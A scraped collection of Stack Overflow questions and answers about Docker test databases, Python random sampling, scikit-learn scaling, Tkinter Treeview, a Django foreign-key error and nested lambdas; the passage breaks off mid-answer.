[ "You are already using a dockerized database as your \"production database\". You could add a second dockerized database as a \"develop database\". This second instance should replicate the production database, and be spun up / torn down as part of the test suite.\nAdvantages of using dockerized database instances as part of the test environment\n\nEnsures that the development environment mimics production\n\nAllows to test database migrations before deploying to a production environment\n\nAllows to test queries before running them in production\n\nOnce setup, maintenance can be easier than the maintenance of mocked data interfaces\n\n\nAdvantages of mocking database connections in the test environment\n\nInitial setup is easier\nSmaller project stack (e.g. Docker potentially not required)\n\nGenerally speaking, I personally go for the second approach just for small projects, and spend the time to set up a proper dockerized local environment for any medium or large project.\n\nOn a different note, to the additional question in comments of the OP:\n\nfor my CI/CD pipeline have no idea how to do the test stage without this [create a new database and running a migration] manual procedure\n\nGenerally speaking, a suggested approach would be to:\n\nBundle any required dockerized interface in a docker-compose.yml\nCreate an entrypoint (this can be a Python function) that creates a database, runs database migrations and loads mock data to the database\nRun tests\n\nThe exact commands on CI could look something like:\n- docker-compose up # Initialize database instance\n- make dev-environment # Call a Makefile recipe to create the database, run migrations and load mock data\n- make tests # Call a Makefile recipe to run the test suite\n\n" ]
[ 1 ]
[]
[]
[ "docker", "postgresql", "pytest", "python", "testing" ]
stackoverflow_0074361237_docker_postgresql_pytest_python_testing.txt
Q: How can I perform multiple random.choices tests I have a list called marbles of 10.000 items (5000 blue and 5000 red) I want to do a test. To pick 4 random items from the list I do this import random marbles = ["RED" for _ in range(5000)] + ["BLUE" for _ in range(5000)] A = random.choices(marbles, k=4) print(A) # this will print a list of 4 random Items from the list What I need to do is to perform this test 100 times and print the results. I want to avoid creating 100 different variables and then print them all. What can I do to optimize and avoid >100 lines of code. For loops? I would appreciate any input. Thank you in advance Nothing with my list seemed to have a problem. A: Use a for loop. for x in range(4): print(random.choice(marbles)) A: Sampling with and without replacement It's important to understand the difference between sampling with replacement and without replacement. Say we have a bag of 1 blue and 2 red marbles, and you select 2 marbles. If you put the marble back after pulling the first marble, it's possible to endup with 2 blue marbles. This is called sampling with replacement. Using random.choice is sampling with replacement. random.choices() and random.sample() You can pull more than one element using the choices() function from the random module. For example sampling 4 marbles from a bag of 1 red and 2 blue marbles with replacement: >>> import random >>> marbles = ['red'] * 1 + ['blue'] * 2 >>> random.choices(marbles, k=4) ['red', 'blue', 'blue', 'blue'] You can use sampling without replacement using the random module using the sample function: >>> random.sample(marbles, 4) Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/opt/homebrew/Cellar/python@3.10/3.10.8/Frameworks/Python.framework/Versions/3.10/lib/python3.10/random.py", line 482, in sample raise ValueError("Sample larger than population or is negative") ValueError: Sample larger than population or is negative As expected, this gives an error. You can't draw 4 marbles from a bag of 3. Now if we put 1000 red marbles and 2000 blue marbles in the bag, we get: >>> marbles = ['red'] * 1000 + ['blue'] * 2000 >>> random.sample(marbles, 4) ['blue', 'blue', 'blue', 'red'] Memory usage and weights A possible problem with the examples above is that, if you have more marbles, you need a lot of memory. Therefore, the choice() function has a weights parameter. You can use it like this: >>> marbles = ['red', 'blue'] >>> weights = [1000, 2000] >>> random.choices(marbles, weights=weights, k=4) ['blue', 'blue', 'blue', 'red'] Sadly, the random module doesn't have a function for sampling without replacement using weights. Repeated sampling using for loop Finally, we need to count the outcomes. A more advanced way to do this is using dictionaries and defaultdict from the collections module. As an alternative, we will create a list of outcomes, and loop through the different outcomes using a set of that list. import random SAMPLE_SIZE = 4 REPEAT_SAMPLING = 100 outcomes = [] marbles = ['red'] * 5000 + ['blue'] * 5000 for i in range(REPEAT_SAMPLING): outcome = ', '.join(random.sample(marbles, SAMPLE_SIZE)) outcomes.append(outcome) for outcome in set(outcomes): print(f'{outcome} appeared {outcomes.count(outcome)} times out of {REPEAT_SAMPLING}')
How can I perform multiple random.choices tests
I have a list called marbles of 10.000 items (5000 blue and 5000 red) I want to do a test. To pick 4 random items from the list I do this import random marbles = ["RED" for _ in range(5000)] + ["BLUE" for _ in range(5000)] A = random.choices(marbles, k=4) print(A) # this will print a list of 4 random Items from the list What I need to do is to perform this test 100 times and print the results. I want to avoid creating 100 different variables and then print them all. What can I do to optimize and avoid >100 lines of code. For loops? I would appreciate any input. Thank you in advance Nothing with my list seemed to have a problem.
[ "Use a for loop.\nfor x in range(4):\n print(random.choice(marbles))\n\n", "Sampling with and without replacement\nIt's important to understand the difference between sampling with replacement and without replacement. Say we have a bag of 1 blue and 2 red marbles, and you select 2 marbles. If you put the marble back after pulling the first marble, it's possible to endup with 2 blue marbles. This is called sampling with replacement. Using random.choice is sampling with replacement.\nrandom.choices() and random.sample()\nYou can pull more than one element using the choices() function from the random module. For example sampling 4 marbles from a bag of 1 red and 2 blue marbles with replacement:\n>>> import random\n>>> marbles = ['red'] * 1 + ['blue'] * 2\n>>> random.choices(marbles, k=4)\n['red', 'blue', 'blue', 'blue']\n\nYou can use sampling without replacement using the random module using the sample function:\n>>> random.sample(marbles, 4)\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\n File \"/opt/homebrew/Cellar/python@3.10/3.10.8/Frameworks/Python.framework/Versions/3.10/lib/python3.10/random.py\", line 482, in sample\n raise ValueError(\"Sample larger than population or is negative\")\nValueError: Sample larger than population or is negative\n\nAs expected, this gives an error. You can't draw 4 marbles from a bag of 3. Now if we put 1000 red marbles and 2000 blue marbles in the bag, we get:\n>>> marbles = ['red'] * 1000 + ['blue'] * 2000\n>>> random.sample(marbles, 4)\n['blue', 'blue', 'blue', 'red']\n\nMemory usage and weights\nA possible problem with the examples above is that, if you have more marbles, you need a lot of memory. Therefore, the choice() function has a weights parameter. You can use it like this:\n>>> marbles = ['red', 'blue']\n>>> weights = [1000, 2000]\n>>> random.choices(marbles, weights=weights, k=4)\n['blue', 'blue', 'blue', 'red']\n\nSadly, the random module doesn't have a function for sampling without replacement using weights.\nRepeated sampling using for loop\nFinally, we need to count the outcomes. A more advanced way to do this is using dictionaries and defaultdict from the collections module. As an alternative, we will create a list of outcomes, and loop through the different outcomes using a set of that list.\nimport random\nSAMPLE_SIZE = 4\nREPEAT_SAMPLING = 100\noutcomes = []\nmarbles = ['red'] * 5000 + ['blue'] * 5000\n\nfor i in range(REPEAT_SAMPLING):\n outcome = ', '.join(random.sample(marbles, SAMPLE_SIZE))\n outcomes.append(outcome)\n\nfor outcome in set(outcomes):\n print(f'{outcome} appeared {outcomes.count(outcome)} times out of {REPEAT_SAMPLING}')\n\n" ]
[ 0, 0 ]
[]
[]
[ "loops", "python", "random" ]
stackoverflow_0074574168_loops_python_random.txt
Q: How to scale data with a center that doesn't change with scikit-learn and python I am attempting to scale a dateset to train a machine learning model on using python and scikit-learn. I want to scale a dataset but maintain that all the raw values that are negative remain negative post scaling and all the raw values that are positive remain positive after scaling. Something like this pseudo code for a single feature: from sklearn import preprocessing array = [[-5.0, 0.0, 1.25, 2.5]] scaler = preprocessing.SomeScaler(feature_range=(-1,1), center=0) scaler = scaler.fit(array) print("Scaled:", scaler.transform(array)) #should print Scaled: [[-1.0, 0.0, 0.25, 0.5]] #data arriving after initial scaling might look like this: scaler = scaler.fit([[-0.1, 0.1, 7.0, 10.0]]) print("Scaled:", scaler.transform(array)) #should print Scaled: [[-0.02, 0.02, 1.4, 2.0]] I am new to machine learning, so I am hoping I just don't know the terms / functions of scikit-learn well enough yet. Does something like my above SomeScaler exist in scikit-learn or perhaps another python library? A: Firstly, if you want an array of 1 feature, 4 values you need to reshape your array. import numpy as np print('This is an array of 1-value for 4-features', np.array([[-5.0, 0.0, 1.25, 2.5]]).shape) print('This is an array of 4-values for 1-feature', np.array([-5.0, 0.0, 1.25, 2.5]).shape) #[output] This is an array of 1-value for 4-features (1, 4) #[output] This is an array of 4-values for 1-feature (4,) Secondly, you can scale using MaxAbsScaler: Scale each feature by its maximum absolute value. This estimator scales and translates each feature individually such that the maximal absolute value of each feature in the training set will be 1.0. It does not shift/center the data, and thus does not destroy any sparsity. from sklearn import preprocessing import numpy as np array = [-5.0, 0.0, 1.25, 2.5] #Reshape your data using array.reshape(-1, 1) if your data has a single feature or array to make it 2D array = np.array(array).reshape(-1, 1) print("Array shape after reshaping it to a 2D array: ",array.shape) scaler = preprocessing.MaxAbsScaler() scaler = scaler.fit(array) print("Scaled:", scaler.transform(np.array(array).reshape(-1, 1))) #[output] Array shape after reshaping it to a 2D array: (4, 1) #[output] Scaled: [[-1. ] # [ 0. ] # [ 0.25] # [ 0.5 ]] Imputers usually require arrays to be 2D that is why we used reshape to add a 2nd dimension.
How to scale data with a center that doesn't change with scikit-learn and python
I am attempting to scale a dateset to train a machine learning model on using python and scikit-learn. I want to scale a dataset but maintain that all the raw values that are negative remain negative post scaling and all the raw values that are positive remain positive after scaling. Something like this pseudo code for a single feature: from sklearn import preprocessing array = [[-5.0, 0.0, 1.25, 2.5]] scaler = preprocessing.SomeScaler(feature_range=(-1,1), center=0) scaler = scaler.fit(array) print("Scaled:", scaler.transform(array)) #should print Scaled: [[-1.0, 0.0, 0.25, 0.5]] #data arriving after initial scaling might look like this: scaler = scaler.fit([[-0.1, 0.1, 7.0, 10.0]]) print("Scaled:", scaler.transform(array)) #should print Scaled: [[-0.02, 0.02, 1.4, 2.0]] I am new to machine learning, so I am hoping I just don't know the terms / functions of scikit-learn well enough yet. Does something like my above SomeScaler exist in scikit-learn or perhaps another python library?
[ "\nFirstly, if you want an array of 1 feature, 4 values you need to reshape your array.\n\nimport numpy as np\nprint('This is an array of 1-value for 4-features', np.array([[-5.0, 0.0, 1.25, 2.5]]).shape)\nprint('This is an array of 4-values for 1-feature', np.array([-5.0, 0.0, 1.25, 2.5]).shape)\n#[output] This is an array of 1-value for 4-features (1, 4)\n#[output] This is an array of 4-values for 1-feature (4,)\n\n\nSecondly, you can scale using MaxAbsScaler:\n\n\nScale each feature by its maximum absolute value.\nThis estimator scales and translates each feature individually such that the maximal absolute value of each feature in the training set will be 1.0. It does not shift/center the data, and thus does not destroy any sparsity.\n\n\nfrom sklearn import preprocessing\nimport numpy as np\n\narray = [-5.0, 0.0, 1.25, 2.5]\n#Reshape your data using array.reshape(-1, 1) if your data has a single feature or array to make it 2D\narray = np.array(array).reshape(-1, 1)\nprint(\"Array shape after reshaping it to a 2D array: \",array.shape)\nscaler = preprocessing.MaxAbsScaler()\nscaler = scaler.fit(array)\nprint(\"Scaled:\", scaler.transform(np.array(array).reshape(-1, 1)))\n\n#[output] Array shape after reshaping it to a 2D array: (4, 1)\n#[output] Scaled: [[-1. ]\n# [ 0. ]\n# [ 0.25]\n# [ 0.5 ]]\n\nImputers usually require arrays to be 2D that is why we used reshape to add a 2nd dimension.\n" ]
[ 1 ]
[]
[]
[ "data_preprocessing", "machine_learning", "normalization", "python", "scikit_learn" ]
stackoverflow_0074574548_data_preprocessing_machine_learning_normalization_python_scikit_learn.txt
Q: Replace value text in Tkinter Treeview Is there way to replace the value that is displayed (in this case a very long hyperlink) in a Tkinter treeview column with something shorter (but it still open the hyperlink)? The example I have is similar to the screenshot below, except the Google link is actually a very long OneNote link. I would like to be able to replace the text that is displayed with a "Click Here". So for this example, "Click Here" would take the user to www.google.com. The code I'm using to add the hyperlink is as follows: from tkinter import * from tkinter import ttk import webbrowser as wb root=Tk() root.title('Decision Tree') root.geometry("600x600") my_tree = ttk.Treeview(root) #Define the columns my_tree['columns'] = ("Decision", "Hyperlinks", "ID") #format the columns my_tree.column("#0", width=250, minwidth=100) my_tree.column("#1", width=0, stretch="No") my_tree.column("Hyperlinks", anchor=W, width=200) my_tree.column("ID", anchor=CENTER, width=80) #Create Headings my_tree.heading("#0", text="Decision", anchor=W) my_tree.heading("#1", text="", anchor=W) my_tree.heading("Hyperlinks", text="Hyperlinks", anchor=W) my_tree.heading("ID", text="ID", anchor=CENTER) #Add Data (Top Level) my_tree.insert(parent='', index='1', iid=0, text="Problem 1", values=("", "", "1")) my_tree.insert(parent='', index='1', iid=2, text="Problem 2", values=("", "", "3")) my_tree.insert(parent='', index='1', iid=1, text="Problem 3", values=("", "", "2")) my_tree.tag_configure('tag1', foreground='Blue', font=('Helvetica' ,8, 'bold', 'italic')) #Add child level 1 my_tree.insert(parent='0', index='end', iid=6, text="Prob 1 level 2", values=("", "www.google.com", "1.1"), tags='tag1',) my_tree.insert(parent='1', index='end', iid=7, text="Prob 3 level 2", values=("", "www.google.com", "3.1"), tags='tag1',) my_tree.insert(parent='2', index='end', iid=8, text="Prob 2 level 2", values=("", "www.google.com", "2.1"), tags='tag1',) #Add child level 2 my_tree.insert(parent='6', index='end', iid=9, text="Prob 1 level 3", values=("", "", "1.11")) my_tree.insert(parent='7', index='end', iid=10, text="Prob 2 level 3", values=("", "", "2.21")) def open_link(event): tree = event.widget # get the treeview widget region = tree.identify_region(event.x, event.y) col = tree.identify_column(event.x) iid = tree.identify('item', event.x, event.y) if region == 'cell' and col == '#2': link = tree.item(iid)['values'][1] # get the link from the selected row wb.open_new_tab(link) # open the link in a browser tab # bind left-click to 'open_link' my_tree.bind('<Button-1>', open_link) #pack to the screen my_tree.pack(pady=20) root.mainloop() A: You can store the links in a dictionary, with the key being whatever you want to display to the user. Then it’s just a matter of looking up the link when the user clicks. Another alternative is to put the actual link in a hidden column.
Replace value text in Tkinter Treeview
Is there way to replace the value that is displayed (in this case a very long hyperlink) in a Tkinter treeview column with something shorter (but it still open the hyperlink)? The example I have is similar to the screenshot below, except the Google link is actually a very long OneNote link. I would like to be able to replace the text that is displayed with a "Click Here". So for this example, "Click Here" would take the user to www.google.com. The code I'm using to add the hyperlink is as follows: from tkinter import * from tkinter import ttk import webbrowser as wb root=Tk() root.title('Decision Tree') root.geometry("600x600") my_tree = ttk.Treeview(root) #Define the columns my_tree['columns'] = ("Decision", "Hyperlinks", "ID") #format the columns my_tree.column("#0", width=250, minwidth=100) my_tree.column("#1", width=0, stretch="No") my_tree.column("Hyperlinks", anchor=W, width=200) my_tree.column("ID", anchor=CENTER, width=80) #Create Headings my_tree.heading("#0", text="Decision", anchor=W) my_tree.heading("#1", text="", anchor=W) my_tree.heading("Hyperlinks", text="Hyperlinks", anchor=W) my_tree.heading("ID", text="ID", anchor=CENTER) #Add Data (Top Level) my_tree.insert(parent='', index='1', iid=0, text="Problem 1", values=("", "", "1")) my_tree.insert(parent='', index='1', iid=2, text="Problem 2", values=("", "", "3")) my_tree.insert(parent='', index='1', iid=1, text="Problem 3", values=("", "", "2")) my_tree.tag_configure('tag1', foreground='Blue', font=('Helvetica' ,8, 'bold', 'italic')) #Add child level 1 my_tree.insert(parent='0', index='end', iid=6, text="Prob 1 level 2", values=("", "www.google.com", "1.1"), tags='tag1',) my_tree.insert(parent='1', index='end', iid=7, text="Prob 3 level 2", values=("", "www.google.com", "3.1"), tags='tag1',) my_tree.insert(parent='2', index='end', iid=8, text="Prob 2 level 2", values=("", "www.google.com", "2.1"), tags='tag1',) #Add child level 2 my_tree.insert(parent='6', index='end', iid=9, text="Prob 1 level 3", values=("", "", "1.11")) my_tree.insert(parent='7', index='end', iid=10, text="Prob 2 level 3", values=("", "", "2.21")) def open_link(event): tree = event.widget # get the treeview widget region = tree.identify_region(event.x, event.y) col = tree.identify_column(event.x) iid = tree.identify('item', event.x, event.y) if region == 'cell' and col == '#2': link = tree.item(iid)['values'][1] # get the link from the selected row wb.open_new_tab(link) # open the link in a browser tab # bind left-click to 'open_link' my_tree.bind('<Button-1>', open_link) #pack to the screen my_tree.pack(pady=20) root.mainloop()
[ "You can store the links in a dictionary, with the key being whatever you want to display to the user. Then it’s just a matter of looking up the link when the user clicks.\nAnother alternative is to put the actual link in a hidden column.\n" ]
[ 1 ]
[]
[]
[ "hyperlink", "python", "tkinter", "treeview" ]
stackoverflow_0074573939_hyperlink_python_tkinter_treeview.txt
Q: What Python Libraries I can use to produce such markers on a map. The marker should also have a popup functionality I tried to inspect element the website I got this image from but did not quite find anything useful. Here is the link
What Python Libraries I can use to produce such markers on a map. The marker should also have a popup functionality
I tried to inspect element the website I got this image from but did not quite find anything useful. Here is the link
[]
[]
[ "Hi Hope you are doing well!\nI can highly recommend plotly for this task, I was using it in my previous to create a dashboard with a map and different labels/markers etc. It has a lot of benefits (e.g., different kinds of map styles) and really easy to use!\n\nExample of the plotly usage for maps visualization: https://plotly.com/python/scattermapbox/\n\nplotly docs: https://plotly.com/graphing-libraries/\n\nHow to change the style of the map: https://plotly.com/python/mapbox-layers/\n\n\n" ]
[ -1 ]
[ "maps", "python", "visualization" ]
stackoverflow_0074568686_maps_python_visualization.txt
Q: Tkinter treeview selection of mutiple rows and retrieve the selected rows I am using the sample Treeview widget for the user to select the multiple rows. I used the tree.selection method for this in the code. However, I am unable to figure out a better approach to retrieve the selected rows in an appropriate way. For example, If the user selects the IDs with 1 and 2. Then I would like to use the Price ,Items information etc for the different task. If the user selects all the three rows then so on .... Below is the working sample, I tried to split it and saved it in the variables but it will not work if the user select one or two rows ?[![enter image description here][1]][1] Thanks. import tkinter as tk import tkinter.ttk def Tree_Focus_Area(): curItems = tree.selection() Var=",".join([str(tree.item(i)['values']) for i in curItems]) a, b,c,d,e,f,g,h,i,j,k,l = str(Var).split(",") print("The selected items for the first ID:", a,b,c,d) print("The selected items for the second ID:", e,f,g,h) print("The selected items for the second ID:", i,j,k,l) root = tk.Tk() tree = tkinter.ttk.Treeview(root, height=4) tree['show'] = 'headings' tree['columns'] = ('ID', 'Items', 'Price', 'Priority') tree.heading("#1", text='ID', anchor='w') tree.column("#1", stretch="no") tree.heading("#2", text='Items', anchor='w') tree.column("#2", stretch="no") tree.heading("#3", text='Price', anchor='w') tree.column("#3", stretch="no") tree.heading("#4", text='Priority', anchor='w') tree.column("#4", stretch="no") tree.pack() tree.insert("", "end", values=["1", "Laptop", "$1000.50", "10"]) tree.insert("", "end", values=["2", "Desktop Equipment", "$800.50", "5"]) tree.insert("", "end", values=["3", "Office Supplies", "$467.50", "7"]) tree.bind("<Return>", lambda e: Tree_Focus_Area()) root.mainloop() Updated code def Tree_Focus_Area(): #from @acw1668 selections = tree.selection() rows = [tree.item(i, 'values') for i in selections] return tuple(rows) root = tk.Tk() tree = tkinter.ttk.Treeview(root, height=4) tree['show'] = 'headings' tree['columns'] = ('ID', 'Items', 'Price', 'Priority') tree.heading("#1", text='ID', anchor='w') tree.column("#1", stretch="no") tree.heading("#2", text='Items', anchor='w') tree.column("#2", stretch="no") tree.heading("#3", text='Price', anchor='w') tree.column("#3", stretch="no") tree.heading("#4", text='Priority', anchor='w') tree.column("#4", stretch="no") tree.pack() tree.insert("", "end", values=["1", "Laptop", "$1000.50", "10"]) tree.insert("", "end", values=["2", "Desktop Equipment", "$800.50", "5"]) tree.insert("", "end", values=["3", "Office Supplies", "$467.50", "7"]) tree.bind("<Return>", lambda e: Tree_Focus_Area()) ****Trying to access the tuple outside the function here**** var = Tree_Focus_Area() print(var) #Returning empty if I use this way? root.mainloop() A: You can simply get the values tuple of the selected rows and append them to a list: def Tree_Focus_Area(): selections = tree.selection() rows = [tree.item(i, 'values') for i in selections] for i, row in enumerate(rows, 1): print(f"The selected items for ID #{i}:", ', '.join(row))
Tkinter treeview selection of mutiple rows and retrieve the selected rows
I am using the sample Treeview widget for the user to select the multiple rows. I used the tree.selection method for this in the code. However, I am unable to figure out a better approach to retrieve the selected rows in an appropriate way. For example, If the user selects the IDs with 1 and 2. Then I would like to use the Price ,Items information etc for the different task. If the user selects all the three rows then so on .... Below is the working sample, I tried to split it and saved it in the variables but it will not work if the user select one or two rows ?[![enter image description here][1]][1] Thanks. import tkinter as tk import tkinter.ttk def Tree_Focus_Area(): curItems = tree.selection() Var=",".join([str(tree.item(i)['values']) for i in curItems]) a, b,c,d,e,f,g,h,i,j,k,l = str(Var).split(",") print("The selected items for the first ID:", a,b,c,d) print("The selected items for the second ID:", e,f,g,h) print("The selected items for the second ID:", i,j,k,l) root = tk.Tk() tree = tkinter.ttk.Treeview(root, height=4) tree['show'] = 'headings' tree['columns'] = ('ID', 'Items', 'Price', 'Priority') tree.heading("#1", text='ID', anchor='w') tree.column("#1", stretch="no") tree.heading("#2", text='Items', anchor='w') tree.column("#2", stretch="no") tree.heading("#3", text='Price', anchor='w') tree.column("#3", stretch="no") tree.heading("#4", text='Priority', anchor='w') tree.column("#4", stretch="no") tree.pack() tree.insert("", "end", values=["1", "Laptop", "$1000.50", "10"]) tree.insert("", "end", values=["2", "Desktop Equipment", "$800.50", "5"]) tree.insert("", "end", values=["3", "Office Supplies", "$467.50", "7"]) tree.bind("<Return>", lambda e: Tree_Focus_Area()) root.mainloop() Updated code def Tree_Focus_Area(): #from @acw1668 selections = tree.selection() rows = [tree.item(i, 'values') for i in selections] return tuple(rows) root = tk.Tk() tree = tkinter.ttk.Treeview(root, height=4) tree['show'] = 'headings' tree['columns'] = ('ID', 'Items', 'Price', 'Priority') tree.heading("#1", text='ID', anchor='w') tree.column("#1", stretch="no") tree.heading("#2", text='Items', anchor='w') tree.column("#2", stretch="no") tree.heading("#3", text='Price', anchor='w') tree.column("#3", stretch="no") tree.heading("#4", text='Priority', anchor='w') tree.column("#4", stretch="no") tree.pack() tree.insert("", "end", values=["1", "Laptop", "$1000.50", "10"]) tree.insert("", "end", values=["2", "Desktop Equipment", "$800.50", "5"]) tree.insert("", "end", values=["3", "Office Supplies", "$467.50", "7"]) tree.bind("<Return>", lambda e: Tree_Focus_Area()) ****Trying to access the tuple outside the function here**** var = Tree_Focus_Area() print(var) #Returning empty if I use this way? root.mainloop()
[ "You can simply get the values tuple of the selected rows and append them to a list:\ndef Tree_Focus_Area():\n selections = tree.selection()\n rows = [tree.item(i, 'values') for i in selections]\n for i, row in enumerate(rows, 1):\n print(f\"The selected items for ID #{i}:\", ', '.join(row))\n\n" ]
[ 1 ]
[]
[]
[ "python", "tkinter", "treeview" ]
stackoverflow_0074574078_python_tkinter_treeview.txt
Q: Django ValueError: Cannot assign ">": "Booking.user" must be a "Customer" instance The objective is simple: I'm building a car rental platform where customers can place an order for a car. The simple 'order' contains the car, start, and end-dates. The form should automatically save the authenticated user as the creator. It uses a CreateView with this code: class BookingCreate(CreateView): model = Booking fields = ['car', 'start_date', 'end_date'] permission_classes = [permissions.IsAuthenticated] def form_valid(self, form): form.instance.user = self.request.user return super().form_valid(form) The form works fine, but when submitted, it raises this error: ValueError at /rentals/booking/create Cannot assign "<SimpleLazyObject: <CustomUser: Test2 Two>>": "Booking.user" must be a "Customer" instance. I've looked up previous answers, and the best solution came from this thread, which recommended using this code instead def form_valid(self, form): form.instance.user = Booking.objects.get(user=self.request.user) return super().form_valid(form) However, this change returns a slightly different error: ValueError at /rentals/booking/create Cannot query "Test2 Two": Must be "Customer" instance. I have a customUser Model and a "customer" model that inherits from it. For additional context, I am using a customUser model. Because I have multiple user types (in particular (car) Owners and Customers), I use a special table with boolean fields to mark each type as True based on the registration form they use per this this tutorial. Here's the relevant code (there's a lot, so I've only added the relevant parts): models.py from accounts.models import CustomUser class User(CustomUser): is_customer = models.BooleanField(default=False) is_owner = models.BooleanField(default=False) class Owner(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True) def __str__(self): return self.user.first_name class Customer(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True) cars = models.ManyToManyField('Car', blank=True) ... def get_absolute_url(self): return reverse('rental:customer-detail', args=[str(self.id)]) def __str__(self): return f'{ self.user.first_name } { self.user.last_name }' class Booking(models.Model): """Stores the bookings, for example when it was made, the booking date, and the car ID.""" # Unique ID for this booking. id = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text="Automatically generated unique ID. Do not change.") user = models.ForeignKey('Customer', on_delete=models.SET_NULL, null=True) car = models.ForeignKey(Car, on_delete=models.SET_NULL, null=True) start_date = models.DateField(default=timezone.now) end_date = models.DateField(null=True) ... Solution and extra resources for future explorers Both answers below helped, but the issue kept coming back. The permanent solution was this line of code: def form_valid(self, form): form.instance.created_by = Customer.objects.get(pk=self.request.user.pk) return super().form_valid(form) As alluded to in the question above, this is a common problem. So here are three other threads to look at, each with great answers: ValueError at /post/new/ Cannot assign "<SimpleLazyObject:<User: chetan>>": "Post.author" must be a "User" instance Cannot assign "<SimpleLazyObject: <User: XXX>>": "Comment.user" must be a "MyProfile" instance Cannot assign "<SimpleLazyObject: <User: JohnDoe12>>": "Profile.user" must be a "User" instance A: Your self.request.user (or the user you're logged in as) seems to be the CustomUser instance, but you're trying to assign the User instance to the Booking. Though it has the same fields (as it inherits from CustomUser class), it is a different object. I think you want to make the CustomUser an abstract model? You should add abstract to the CustomUser class. See: https://docs.djangoproject.com/en/4.1/topics/db/models/#abstract-base-classes class Meta: abstract = True Then you would also need to select the correct user model in you'r settings like: AUTH_USER_MODEL = 'users.User' for example https://docs.djangoproject.com/en/4.1/topics/auth/customizing/#substituting-a-custom-user-model Also in the second option you're assigning the Booking instead of the related user. Do this instead: def form_valid(self, form): form.instance.user = Booking.objects.get(user=self.request.user).user return super().form_valid(form) A: I'd recommend you to use get_object_or_404() and you need to assign user not Booking instance so: def form_valid(self, form): form.instance.user=get_object_or_404(Booking,user=self.request.user).user return super().form_valid(form)
Django ValueError: Cannot assign ">": "Booking.user" must be a "Customer" instance
The objective is simple: I'm building a car rental platform where customers can place an order for a car. The simple 'order' contains the car, start, and end-dates. The form should automatically save the authenticated user as the creator. It uses a CreateView with this code: class BookingCreate(CreateView): model = Booking fields = ['car', 'start_date', 'end_date'] permission_classes = [permissions.IsAuthenticated] def form_valid(self, form): form.instance.user = self.request.user return super().form_valid(form) The form works fine, but when submitted, it raises this error: ValueError at /rentals/booking/create Cannot assign "<SimpleLazyObject: <CustomUser: Test2 Two>>": "Booking.user" must be a "Customer" instance. I've looked up previous answers, and the best solution came from this thread, which recommended using this code instead def form_valid(self, form): form.instance.user = Booking.objects.get(user=self.request.user) return super().form_valid(form) However, this change returns a slightly different error: ValueError at /rentals/booking/create Cannot query "Test2 Two": Must be "Customer" instance. I have a customUser Model and a "customer" model that inherits from it. For additional context, I am using a customUser model. Because I have multiple user types (in particular (car) Owners and Customers), I use a special table with boolean fields to mark each type as True based on the registration form they use per this this tutorial. Here's the relevant code (there's a lot, so I've only added the relevant parts): models.py from accounts.models import CustomUser class User(CustomUser): is_customer = models.BooleanField(default=False) is_owner = models.BooleanField(default=False) class Owner(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True) def __str__(self): return self.user.first_name class Customer(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True) cars = models.ManyToManyField('Car', blank=True) ... def get_absolute_url(self): return reverse('rental:customer-detail', args=[str(self.id)]) def __str__(self): return f'{ self.user.first_name } { self.user.last_name }' class Booking(models.Model): """Stores the bookings, for example when it was made, the booking date, and the car ID.""" # Unique ID for this booking. id = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text="Automatically generated unique ID. Do not change.") user = models.ForeignKey('Customer', on_delete=models.SET_NULL, null=True) car = models.ForeignKey(Car, on_delete=models.SET_NULL, null=True) start_date = models.DateField(default=timezone.now) end_date = models.DateField(null=True) ... Solution and extra resources for future explorers Both answers below helped, but the issue kept coming back. The permanent solution was this line of code: def form_valid(self, form): form.instance.created_by = Customer.objects.get(pk=self.request.user.pk) return super().form_valid(form) As alluded to in the question above, this is a common problem. So here are three other threads to look at, each with great answers: ValueError at /post/new/ Cannot assign "<SimpleLazyObject:<User: chetan>>": "Post.author" must be a "User" instance Cannot assign "<SimpleLazyObject: <User: XXX>>": "Comment.user" must be a "MyProfile" instance Cannot assign "<SimpleLazyObject: <User: JohnDoe12>>": "Profile.user" must be a "User" instance
[ "Your self.request.user (or the user you're logged in as) seems to be the CustomUser instance, but you're trying to assign the User instance to the Booking. Though it has the same fields (as it inherits from CustomUser class), it is a different object.\nI think you want to make the CustomUser an abstract model?\nYou should add abstract to the CustomUser class.\nSee: https://docs.djangoproject.com/en/4.1/topics/db/models/#abstract-base-classes\n class Meta:\n abstract = True\n\nThen you would also need to select the correct user model in you'r settings like:\nAUTH_USER_MODEL = 'users.User' for example\nhttps://docs.djangoproject.com/en/4.1/topics/auth/customizing/#substituting-a-custom-user-model\nAlso in the second option you're assigning the Booking instead of the related user. Do this instead:\ndef form_valid(self, form): \n form.instance.user = Booking.objects.get(user=self.request.user).user \n return super().form_valid(form)\n\n", "I'd recommend you to use get_object_or_404() and you need to assign user not Booking instance so:\ndef form_valid(self, form): \n form.instance.user=get_object_or_404(Booking,user=self.request.user).user \n return super().form_valid(form)\n\n" ]
[ 1, 1 ]
[]
[]
[ "django", "django_forms", "django_models", "django_queryset", "python" ]
stackoverflow_0074574723_django_django_forms_django_models_django_queryset_python.txt
Q: How to read and break down complex lambda equations in python This question below is from a past year NUS exam paper, and im not sure how to go about solving this; how do you break down the lambda parts and figure out which bracket is for which lambda variable? I'm unable to trace the code to get 120 def combinator(y): return (lambda x: lambda y: x(y))(lambda x:y) combinator(lambda x:x*10)(11)(12) Ive tried to google but the lambda tutorials are mostly basic so im not sure how to read and break down more complex lambda codes and higher order functions A: The function is def combinator(y): return (lambda x: lambda y: x(y))(lambda x:y) combinator(lambda x:x*10)(11)(12) Let's try to simplify the function. First, take note that you can change the symbol for a function. For example, lambda x: x can be changed to lambda z: z. As there are a lot of x and y, we will change the symbols to reduce the confusion. def combinator(y): return (lambda w: lambda z: w(z))(lambda x:y) combinator(lambda x:x*10)(11)(12) Let's try to define the function as mathematics function to make it easier to understand. Let's set f represents lambda x:x*10, so f(x) = x*10 g represents lambda x:y, so g(x) = y h represents lambda z:w(z), so h(z) = w(z) => h = w k represents lambda w: lambda z: w(z), so k(w) = h = w With the mathematics function defined, you can substitute them back to the function. combinator(y) = (lambda w: lambda z: w(z))(lambda x:y) = k(g) = g Therefore, we know that combinator(y) = g combinator(y)(x) = g(x) = y combinator(y)(x)(z) = y(z) Therefore 